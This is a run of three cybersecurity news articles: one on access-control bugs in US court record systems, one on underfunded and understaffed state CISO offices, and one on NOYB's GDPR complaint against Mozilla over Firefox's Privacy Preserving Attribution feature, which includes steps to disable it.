A similar platform, Thomson Reuters' C-Track eFiling, allowed attackers to escalate from regular user accounts to those saved for court administrators by manipulating certain fields in the registration process. A patch for the "critical" 9.1-rated bug was confirmed last week.

More issues of similar severity were uncovered in court record systems used in counties in Florida, Arizona, Georgia, South Carolina, and others.

**Why GovTech Is So Flawed**

Government technologies tend to be flawed for all the reasons one might guess.

"A lot of their systems that I've seen are quite literally 20 years old," Parker explains. "They're just adding whatever on top of these legacy platforms for years and years."

Besides standard bureaucracy, outdated and unloved tech is kept alive thanks to a lack of sufficient funding for new systems, services, and security solutions to protect them. And vendors aren't always held to account for the ways in which they fall short on their ends of the bargain.

If anything's going to change, Parker says, it will start with the Federal Risk and Authorization Management Program (FedRAMP) — a governmentwide program for cloud security assessment, authorization, and continuous monitoring — and StateRAMP — a nonprofit offering a similar program for state and local governments. "These are minimum requirements for cybersecurity," Parker says, "and they're being adopted by more and more states, and counties, too."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Gov't, Judicial IT Systems Beset by Access Control Bugs

CISOs for US states face the same kinds of challenges those at private companies do: lots of work to handle, but not necessarily enough money or people to handle it sufficiently well.

Source: Timothy Swope via Alamy Stock Photo

Chief information security officers (CISOs) of US states are being stretched thin by widening responsibilities and insufficient resources to achieve them.

Today, and for some time now, every state and the District of Columbia has had its own, dedicated CISO office.

"In the early 2000s, the advent of the Internet and the desire to develop citizen-facing applications accessible from the Internet really started that trend," explains Srini Subramanian, co-author of the newly released biennial cybersecurity report from Deloitte and the National Association of Chief Information Officers (NASCIO). State governments, he notes, are as attractive as cyber targets as any company.

"States collect, share, and use data of residents from birth, including school, driving records, health records, and more," he explains. "So they do have very comprehensive information about people in very large volumes, which makes them attractive targets."

Like CISOs of corporations, these individuals are responsible for building and managing statewide IT security programs and policies, managing cyber-risks and incident response efforts, ensuring compliance with relevant regulations and standards, and more. Also like CISOs of corporations, state CISOs face the same hindrances to their jobs.

Related:Dark Reading Confidential: The CISO and the SEC

Among all 51 US state CISOs surveyed in the Deloitte/NASCIO report, many report an expansion of their responsibilities with regard to protecting data privacy, risk management, and more. At the same time, plenty report having insufficient funds and personnel for actually handling those responsibilities.

"State systems don't have as many resources as the private sector," Subramanian says. For example, "When we make a comparison to a financial services institution — they have thousands of full-time \[cybersecurity employees\]. In this report, 80% of states report anywhere from five to 50 people. States are being asked to do a lot more with very few resources, and it is a real challenge in terms of how they can accomplish their goals."

**More Work for State CISOs**

Meanwhile, state CISOs are doing more today than ever before. More CISO's offices now provide support to stage agencies in the realms of strategy, governance, and risk management (up 17%), security management and operations (up 8% over 2022), incident response (up 17%), and network and infrastructure (up 7%).

Most starkly: 86% of CISO's offices now handle data privacy, up from 60% just two years ago, thanks, perhaps, to new data privacy rules spreading across the nation.

Related:FERC Outlines Supply Chain Security Rules for Power Plants

The lone counterpoint is that state CISOs today have markedly less to worry about when it comes to physical security, providing a kind of counterbalance.

In 2020 (52%) and 2022 (54%), a majority of CISO's offices handled physical security for data centers and other pertinent facilities, but in 2024 that number plummeted to 35%. Today, just six state cybersecurity budgets allocate anything toward physical security. That, Deloitte posited, may indicate that states have been consolidating their data centers, or outsourcing to third-party providers.

**Budgets, Staffing Lag Behind**

Compared to their increased workloads, however, state CISOs offices are not being financed and staffed with equivalent fervor.

Most respondents didn't even know what percentage of their states' IT budgets were allocated to cybersecurity, specifically. Among those who did, four reported that it made up somewhere between 0% and 1% of their states' funding for IT. On the flip side, just one in five reported rates of 3% and above.

For a sense of just how low those figures are, consider that out of the $75 billion in IT spend that the White House proposes for civilian agencies in the 2025 fiscal year, $13 billion — about 17% — is set aside for cybersecurity-related activities.

Related:Shadow AI, Data Exposure Plague Workplace Chatbot Use

"The rigor and emphasis on cyber has always been greater in the federal government," Subramanian notes. As a result, "State CISOs have to go and seek resources from the CIOs as part of their technology budget. Whereas in the federal government, all federal agencies have had to, for the last several years, submit a cyber budget request, and really outline how they are going to spend that money on cyber."

Budget constraints and a talent shortage help explain why nearly four in five state CISOs cite staffing as a challenge. Though the number of scarily understaffed offices has dropped — just two respondents reported having one to five full-time employees, down from six in 2022 — more than half of state CISOs report that their staff lack the competencies necessary to deal with the demands of the job.

**Why the Same CISO Issues Keep Cropping Up**

Whether it be a private company or a government organization, large or small, the issues that face CISOs today are pretty consistent across the board, because the underlying gap between security leaders and their colleagues always tends to take a similar shape.

"Until the security program is not perceived as a 'cost' but rather a 100 times unplanned-for-cost-avoiding department, CISOs will struggle with budget and relevance," says Pete Nicoletti, global field CISO at Check Point Software. "CISOs and security practitioners typically have a hard time justifying their programs to leadership. We are too technical and are worried that the sky is falling 24/7. We can usually get the minimum budget approved based on compliance mandates, but we all know that is not enough."

To close that gap, he suggests, security leaders need to get more people whose jobs don't involve security involved in the security process: "Involve your directors and leaders in every tabletop exercise, share every report on external threats, and teach them all the terms they need to know, so they can see it your way!”

Some states, actually, are already employing this tactic to interesting effect. Subramanian recalls how, "in Texas, there is a regional security operations center that has been set up with a combination of a university, private sector, and the government. The first level of triaging is done by students who are working part time, as they are doing cybersecurity studies. So this can address both the talent issues facing CISOs, as well as getting things done for states and local governments."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Overtaxed State CISOs Struggle With Budgeting, Staffing

NOYB, a European privacy group has filed a complaint with Austrian authorities, alleging that Mozilla breached GDPR by…

NOYB, a European privacy group has filed a complaint with Austrian authorities, alleging that Mozilla breached GDPR by enabling “Privacy Preserving Attribution” (PPA), a tracking feature in Firefox, by default without user consent.

The European Center for Digital Rights (NOYB) based in Vienna, Austria has lodged a formal complaint against Mozilla, accusing the company of turning its Firefox browser into a “tracking tool” through the introduction of a privacy feature known as Privacy Preserving Attribution (PPA).

In **July 2024**, Mozilla included the PPA feature in its Firefox update version 128.0. According to Mozilla, PPA is intended to help advertisers understand ad effectiveness without allowing individual websites to collect personal user data. Instead, Firefox itself aggregates ad interaction data on behalf of users before passing this information to advertisers. Mozilla presents this as a balanced solution that maintains user privacy while meeting advertising needs.

However, NOYB sees it differently. The advocacy group claims that PPA effectively turns Firefox into a tool that enables tracking, simply moving the data collection from websites to the browser itself.

According to NOYB’s **report**, the PPA feature violates users’ rights under the European Union’s General Data Protection Regulation (**GDPR**), as it involves data processing without obtaining explicit user consent.

****Concerns Over Default Activation and Lack of Transparency****

NOYB’s main criticism is directed at Mozilla’s implementation of PPA. The feature was enabled by default without notifying users or seeking their consent, making it an opt-out rather than an opt-in system.

NOYB compares this approach to Google’s controversial **Privacy Sandbox**, which also faced criticism for centralizing user tracking within the browser. Felix Mikolasch, a data protection lawyer at NOYB, remarked, “Mozilla has just bought into the narrative that the advertising industry has a right to track users by turning Firefox into an ad measurement tool.”

According to the organization, the alleged lack of transparency has further alarmed privacy advocates, as users were neither informed about the feature nor given the opportunity to decide whether they wanted to participate. Mikolasch added, “It’s a shame that an organization like Mozilla believes that users are too dumb to say yes or no. Users should be able to make a choice, and the feature should have been turned off by default.”

Mozilla has long been **recognized as a privacy-focused company,** particularly as other popular browsers have been criticized for invasive data collection practices. This recent move, however, has called that reputation into question. PPA, while potentially less invasive compared to third-party cookies, nonetheless involves tracking that most users are unaware of, which has led NOYB to demand regulatory scrutiny.

****How to Disable Privacy Preserving Attribution in Firefox Browser?****

For users wanting to disable Privacy Preserving Attribution, Mozilla has **provided** an opt-out process that requires navigating Firefox settings:

*   Click the **menu button** and select **Settings**.
*   Navigate to the **Privacy & Security** section.
*   Under **Website Advertising Preferences**, uncheck the box labeled **“Allow websites to perform privacy-preserving ad measurement”**.

Nevertheless, NOYB has filed a complaint with the Austrian Data Protection Authority (Available **here** (PDF) in English), asking them to investigate Mozilla’s behaviour. The advocacy group demands that Mozilla switch the feature to an opt-in system and properly inform users about the data collection. Moreover, NOYB insists that Mozilla should delete any data processed without proper user consent.

1.  **Avast Fined Millions for Selling User Browsing Data**
2.  **Why Browser Security Matters More Than You Think**
3.  **Apple Safari Safest, Google Chrome Riskiest Browser**
4.  **Mullvad VPN and Tor Project Release Mullvad Browser**
5.  **How much does a data breach cost? + How to prevent it**

Tag

#apple